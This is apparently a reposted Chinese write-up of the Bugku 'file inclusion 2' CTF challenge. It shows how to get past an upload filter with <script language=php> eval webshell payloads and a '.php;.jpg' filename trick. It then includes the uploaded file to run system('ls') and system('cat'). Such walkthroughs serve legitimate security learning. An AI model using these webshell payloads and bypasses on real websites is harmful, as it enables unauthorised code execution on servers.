2. 程式人生 > >bugku-檔案包含2 writeup

bugku-檔案包含2 writeup

阿新 發佈:2019-02-12

檔案包含2

flag格式:SKCTF{xxxxxxxxxxxxxxxx}
hint:檔案包含

這裡寫圖片描述

2.將hello.php改成upload.php,訪問

這裡寫圖片描述
這裡對上傳的檔案的格式和大小做了限制

3.上傳一個圖片馬,burpsuite抓包改字尾為.php上傳失敗

這裡寫圖片描述

4.這對檔案的字尾也做了限制,%00截斷不管用

這裡寫圖片描述

5.換一種姿勢上傳,普通一句話會被過濾

這裡構造<?=eval($_POST['shell']);>

<script language=php>
@eval($_POST[pupil]);
</script>

儲存檔案修改後綴為2333.php;.jpg,成功上傳

/upload/201804141155474379.jpg

這裡寫圖片描述

直接用圖片路徑菜刀是連不上的

使用包含檔案的方式訪問

這裡寫圖片描述
頁面是空白的

使用菜刀連線

還是沒法連線成功…..

6.那就直接構造命令執行

<script language=php>system("ls")</script>

同理,修改後綴名為jpg,如233.php;.jpg,上傳成功
這裡寫圖片描述

7.訪問圖片的包含路徑

http://118.89.219.210:49166/index.php?file=upload/201804141202562458.jpg

這裡寫圖片描述
或者構造命令執行

<script language=php>system("cat 訪問的檔名.txt")</script>

包含檔案的方式直接訪問.txt檔案
這裡寫圖片描述

相關推薦

bugku-檔案包含2 writeup

檔案包含2 flag格式:SKCTF{xxxxxxxxxxxxxxxx} hint:檔案包含 2.將hello.php改成upload.php,訪問 這裡對上傳的檔案的格式和大小做了限制 3.上傳一個圖片馬,burpsuite抓包改字尾為.

bugku-檔案包含2(檔案包含漏洞)

本文介紹三種方法,還會講到這道題菜刀的連線。  進入題目頁面,沒有什麼特別的,只能右鍵檢視原始碼,發現提示需要跳轉到 upload.php上傳頁面     方法一: ①新建一個txt檔案寫入  <script l

Bugku–flag在index裡(本地檔案包含writeup

這道題目裡有經典的本地檔案包含漏洞+php偽協議的結合應用 點選後 注意到url地址  http://120.24.86.145:8005/post/index.php?file=show.php 這是一個典型的檔案包含漏洞,(file關鍵字是提示,

bugku-Web 檔案包含2

開啟網頁檢視原始碼,在最上面發現upload.php,於是我們就訪問這個檔案:http://123.206.31.85:49166/index.php?file=upload.php 發現是讓我們上傳檔案,然而,我們上傳了並沒什麼用,但是下面說出了檔案的位置。 這裡我們構造一個檔案再上傳

BugKuCTF套路滿滿的題--------檔案包含2

首先講一下這道題的思路,檔案包含,什麼是檔案包含?其實簡單來說就是通過一個檔案傳入引數(構造語句)去訪問另一個檔案,從而得到你所想要的東西。 然而,這道題,除了檔案包含的知識。還涉及到了檔案上傳的知識。畢竟,這兩者總是相互存在在。。。。。 好了,接下來,開始解題: 首先進入的介面是一個歡

bugku ctf檔案包含 writeup

開啟題目,直接顯示程式碼 <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__

bugku-flag在index裡(本地檔案包含漏洞+php偽協議)

題目地址http://123.206.87.240:8005/post/ click點選進去 從 url地址可以猜測,需要用到 php://filter偽協議。 用法: php://filter/read=convert.base64encode/resourc

phpMyAdmin 4.0.1--4.2.12 本地檔案包含漏洞(CVE-2014-8959)

利用條件: 1.登入phpmyadmin後臺 2.需要截斷 滿足第二個條件  php版本必須 <5.3.4  搭建環境 我們在www目錄下放置phpinfo.txt 和 phpadmin4.0.3 phpmya

Bugku-一段Base64-Writeup

pan logs 腳本 沒有 編碼格式 get lar .html 分數 轉載請註明出處:http://www.cnblogs.com/WangAoBo/p/7207874.html bugku - 一段Base64 - Writeup 題目: 分析: 本來看到題

php 正則匹配包含字母、數字以及下劃線,且至少包含2

string php code 網上 mat result 自己 滿足 col 新系統註冊功能需對用戶名和密碼做以下要求:包含字母、數字以及下劃線,且至少包含2種; 在網上沒有搜到符合要求的代碼,於是自己對他人代碼做了一點修改,經測試滿足要求。代碼如下: if (!pre

C語言:解決多個C檔案包含同一標頭檔案引起的檔案重複包含問題

解決多個C檔案包含同一標頭檔案引起的檔案重複包含問題,並給出全域性變數如何定義和宣告的方法. 解決方法: 1. 定義公共檔案: global.c 和global.h 其中, global.c檔案中: #include "global.h" //定義全域性變數 int g

Atittit HDFS hadoop 大資料檔案系統java使用總結 目錄 1. 作業系統,進行操作 1 2. Hdfs 類似nfs ftp遠端分散式檔案服務 2 3. 啟動hdfs服務start

Atittit HDFS hadoop 大資料檔案系統java使用總結   目錄 1. 作業系統,進行操作 1 2. Hdfs 類似nfs ftp遠端分散式檔案服務 2 3. 啟動hdfs服務start-dfs.cmd 2 3.1. 配置core-site

C檔案包含.h檔案包含.c檔案總結

原文連結:http://blog.csdn.net/yangtalent1206/article/details/6830051        很多人對C語言中的 “檔案包含”都不陌生了,檔案包含處理在程式開發中會給我們的模組化程式設計帶來很大的好處

18.phpmyadmin 4.8.1 遠端檔案包含漏洞(CVE-2018-12613)

phpmyadmin 4.8.1 遠端檔案包含漏洞(CVE-2018-12613) phpMyAdmin是一套開源的、基於Web的MySQL資料庫管理工具。其index.php中存在一處檔案包含邏輯, 通過二次編碼即可繞過檢查,造成遠端檔案包含漏洞。 受影響版本: phpMyAdmin 4.8.0和4

51Nod 1010 只包含2 3 5的數

K的因子中只包含2 3 5。滿足條件的前10個數是:2,3,4,5,6,8,9,10,12,15。 所有這樣的K組成了一個序列S,現在給出一個數n,求S中 >= 給定數的最小的數。 例如:n = 13,S中 >= 13的最小的數是15,所以輸出15。 收起 輸入 第1

DVWA_File Inclusion 檔案包含 遠端檔案包含拿webshell

    MEDIUM: $file = str_replace( array( "http://", "https://" ), "", $file ); $file = str_replace( array( "../", "..\"" ), "", $file );

C語言預處理命令之檔案包含

檔案包含預處理命令的一般形式是: #include<檔名> 或者 #include“檔名” #include命令告訴前處理器用指定檔案的內容替換這條命令,兩種不同的命令格式決定了前處理器對指定檔案的搜尋方式:如果檔名是用一對尖括號括起來的,則前處理器直接到存放編譯器所提供的標準標頭檔案的目

C語言入門(廿二)之預處理指令、巨集、條件編譯、檔案包含、typedef、const

預處理指令 什麼是預處理指令: 在我們的檔案翻譯成0和1之前做的操作我們稱之為預處理指令。一般情況預處理指令都是以#號開頭的。 巨集定義的格式 不帶引數的巨集定義: #define 巨集名 值 巨集定義的作用:      

debian9安裝busybox,並製作根檔案系統(2)

3,製作根檔案系統 在上文debian9安裝busybox,並製作根檔案系統(1)中輸入make install命令進行安裝,busybox會自動將rootfs根檔案系統安裝到之前設定的目錄下,之前我設定的是/home/guoyanzhang/rootfs,進入之後, ##ls -l drw

第3章:Hadoop分散式檔案系統(2)

資料流 讀取檔案資料的剖析 為了知道客戶端與HDFS,NameNode,DataNode互動過程中資料的流向,請看圖3-2,這張圖顯示了讀取檔案過程中主要的事件順序。 客戶端通過呼叫FileSystem物件的open()方法開啟一個希望從中讀取資料的檔案,對於HDFS來說,FileSystem是一個Dis